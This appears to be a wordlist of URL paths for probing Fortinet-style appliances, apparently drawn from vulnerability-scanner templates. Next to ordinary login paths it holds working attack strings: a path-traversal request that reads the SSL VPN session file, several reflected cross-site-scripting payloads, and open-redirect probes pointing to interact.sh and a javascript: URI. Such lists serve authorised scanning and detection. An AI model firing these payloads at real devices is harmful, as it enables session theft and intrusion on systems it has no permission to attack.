/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/configWizard/keyUpload.jsp
/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}
/login?redir=/ng
/ui/#navigate/Login
/gui/login
/api/v1
/signin
/m/
/p/login/
/WelcomeActions.jsp?action=ajaxGetWelcomeViewInfo

/login
/phoenix/login.html
/auth/login
/index.html
/wlm/login?next=/wlm
/admin/
/remote/login?&err=--%3E%3Cscript%3Ealert(
/login?redir=http://www.interact.sh
/remote/loginredir?redir=javascript:alert(document.domain)
/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cscript%3E
/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B
/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E
/error3?msg=30&data=
/omni_success?cmdb_edit_path=\
/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)>
